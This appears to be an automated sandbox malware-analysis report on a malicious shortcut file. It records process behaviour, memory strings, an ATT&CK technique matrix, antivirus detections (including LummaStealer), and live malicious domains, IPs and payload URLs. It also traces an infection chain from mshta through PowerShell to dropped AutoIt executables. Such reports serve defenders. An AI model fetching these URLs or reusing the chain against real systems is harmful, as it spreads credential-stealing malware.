Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 10_2_00007FF79F8ABEF8 GetSystemTimeAsFileTime,10_2_00007FF79F8ABEF8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 10_2_00007FF79F8D2BCF GetUserNameW,10_2_00007FF79F8D2BCF
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 10_2_00007FF79F8B2650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_00007FF79F8B2650
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 10_2_00007FF79F891D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_00007FF79F891D80
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000012.00000002.2020537958.000002DA80408000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000014.00000002.2934777577.0000000001168000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 00000012.00000002.2020537958.000002DA80408000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Public\Guard.exe
Source: powershell.exe, 00000012.00000002.2220188721.000002DAE866A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2225326602.000002DAE8954000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1992534079.0000000004A31000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1993464086.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1983295671.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1993149407.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1992862331.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1987464438.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1993002491.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1993266388.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1975920412.0000000004B30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Guard.exe
Source: powershell.exe, 00000012.00000002.2220188721.000002DAE8614000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2C:\Users\Public\Guard.exe
Source: PefjSkkhb.exe, 0000000A.00000002.1915362734.000001CB92638000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2220188721.000002DAE866A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2225326602.000002DAE8920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2220188721.000002DAE8614000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2214222334.000002DAE66B6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2220188721.000002DAE85D0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000014.00000002.2933482565.0000000000BCF000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.2933482565.0000000000BBE000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000012.00000002.2020537958.000002DA80408000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
Source: SwiftWrite.pif Binary or memory string: WIN_81
Source: SwiftWrite.pif Binary or memory string: WIN_XP
Source: SwiftWrite.pif Binary or memory string: WIN_XPe
Source: SwiftWrite.pif Binary or memory string: WIN_VISTA
Source: PefjSkkhb.exe.5.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pif Binary or memory string: WIN_7
Source: SwiftWrite.pif Binary or memory string: WIN_8
Source: SwiftWrite.pif, 00000018.00000000.2142492621.0000000000A76000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 10_2_00007FF79F904074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00007FF79F904074
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 10_2_00007FF79F903940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_00007FF79F903940
Source: C:\Users\Public\Guard.exe Code function: 20_2_00F2696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,20_2_00F2696E
Source: C:\Users\Public\Guard.exe Code function: 20_2_00F26E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,20_2_00F26E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_00A3696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,24_2_00A3696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_00A36E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,24_2_00A36E32
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 2 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 2 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 37 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 23 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 231 Masquerading | LSA Secrets | 151 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 13 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph] ID: 1577880 | Sample: R8CAg00Db8.lnk | Startdate: 18/12/2024 | Architecture: WINDOWS | Score: 100

Source | Detection | Scanner | Label
R8CAg00Db8.lnk | 21% | ReversingLabs | Win32.Trojan.ForExec

Source | Detection | Scanner | Label
C:\Users\Public\Guard.exe | 8% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ghep1[1] | 39% | ReversingLabs | Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | 8% | ReversingLabs |
C:\Users\user\AppData\Roaming\PefjSkkhb.exe | 32% | ReversingLabs | Win32.Exploit.Generic
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
tiffany-careers.com | 147.45.49.155 | true | true | | unknown
x1.i.lencr.org | unknown | unknown | false | | high
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://tiffany-careers.com/Marketing.pdf | false | Avira URL Cloud: safe | unknown
http://139.99.188.124/kiiMf | true | Avira URL Cloud: safe | unknown
https://tiffany-careers.com/ghep1 | true | Avira URL Cloud: safe | unknown
http://139.99.188.124/QWCheljD.txt | true | Avira URL Cloud: safe | unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://tiffany-careers.com/ghep1LMEMHmshta.exe, 00000003.00000002.1965775429.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1955152490.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948185973.000002B3055CA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://tiffany-careers.com/Marketing.pdf0powershell.exe, 00000005.00000002.1851770246.000001DB4CFEA000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://tiffany-careers.com/PefjSkkhb.exeppowershell.exe, 00000005.00000002.1851770246.000001DB4D25C000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://contoso.com/Licensepowershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://tiffany-careers.com/ghep1NNC:mshta.exe, 00000003.00000003.1948749602.000002B37DB62000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000004.00000003.1737447900.000001CA45653000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1737447900.000001CA456B7000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
              high
              https://tiffany-careers.com/ghep1S-forfiles.exe, 00000000.00000002.1706444973.0000019D3D5F0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.autoitscript.com/autoit3/Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000004.00000003.1737447900.000001CA45606000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
                  high
                  https://tiffany-careers.com/ghep1umshta.exe, 00000003.00000003.1965170677.000002B37DB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956177042.000002B37DB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966235459.000002B37DB13000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://tiffany-careers.com/ghep1vmshta.exe, 00000003.00000002.1966105858.000002B37DADE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://tiffany-careers.com/ghep1https://tiffany-careers.com/ghep1mshta.exe, 00000003.00000003.1957829727.000002B303025000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
                    high
                    https://contoso.com/powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1891591827.000001DB5CE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://oneget.orgXpowershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://tiffany-careers.com/ghep1...tmshta.exe, 00000003.00000002.1966706556.000002BB7FCDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956325043.000002BB7FCDE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://139.99.Hpowershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1851770246.000001DB4CDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80001000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
                              high
                              https://tiffany-careers.com/ghep1GI9mshta.exe, 00000003.00000002.1966105858.000002B37DAD0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.autoitscript.com/autoit3/JGuard.exe, 00000014.00000000.1974013134.0000000000F79000.00000002.00000001.01000000.0000000E.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000018.00000002.2933759546.0000000000A89000.00000002.00000001.01000000.00000010.sdmpfalse
                                high
                                http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1891591827.000001DB5CE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
                                      high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://go.micropowershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Iconpowershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://tiffany-careers.com/mshta.exe, 00000003.00000003.1947805084.000002B37DB43000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://crl.ver)svchost.exe, 00000004.00000002.2938459221.000001CA45800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://tiffany-careers.com/ghep1$global:?powershell.exefalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://tiffany-careers.com/ghep1Hmshta.exe, 00000003.00000002.1966009295.000002B37DA70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://tiffany-careers.com/ghep1Bmshta.exe, 00000003.00000002.1966503123.000002B37DCB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://tiffany-careers.com/ghep1Cmshta.exe, 00000003.00000003.1965170677.000002B37DB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956177042.000002B37DB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966235459.000002B37DB13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://tiffany-careers.com/ghep1=mshta.exe, 00000003.00000002.1965775429.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1955152490.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948185973.000002B3055CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://tiffany-careers.com/ghep18mshta.exe, 00000003.00000002.1966627930.000002BB7FCC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://139.99.188.124powershell.exe, 00000012.00000002.2020537958.000002DA80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://tiffany-careers.com/ghep12Cmshta.exe, 00000003.00000003.1965266864.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966184314.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://tiffany-careers.com/ghep1...mshta.exe, 00000003.00000002.1966627930.000002BB7FCBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://tiffany-careers.com/ghep1)mshta.exe, 00000003.00000002.1966105858.000002B37DADE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://tiffany-careers.com/ghep1C:forfiles.exe, 00000000.00000002.1706444973.0000019D3D5F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957335691.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1965120480.000002B37DBA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966445570.000002B37DBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966105858.000002B37DAD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000005.00000002.1851770246.000001DB4CDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tiffany-careers.compowershell.exe, 00000005.00000002.1851770246.000001DB4CFEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://tiffany-careers.com/ghep1CCmshta.exe, 00000003.00000003.1965266864.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966184314.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://tiffany-careers.com/ghep1ProgramW64forfiles.exe, 00000000.00000002.1706524188.0000019D3D7D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://oneget.orgpowershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          IP | Domain | Country | ASN | ASN Name | Malicious
                                                          139.99.188.124 | unknown | Canada | 16276 | OVHFR | true
                                                          147.45.49.155 | tiffany-careers.com | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | true
                                                          IP
                                                          127.0.0.1
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1577880
                                                          Start date and time:2024-12-18 20:59:16 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 10m 8s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:26
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:R8CAg00Db8.lnk
                                                          renamed because original name is a hash value
                                                          Original Sample Name:cdbfcc4d882ca6b35d7429cebc384245.lnk
                                                          Detection:MAL
                                                          Classification:mal100.expl.evad.winLNK@40/75@5/3
                                                          EGA Information:
                                                          • Successful, ratio: 50%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 59
                                                          • Number of non-executed functions: 248
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .lnk
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
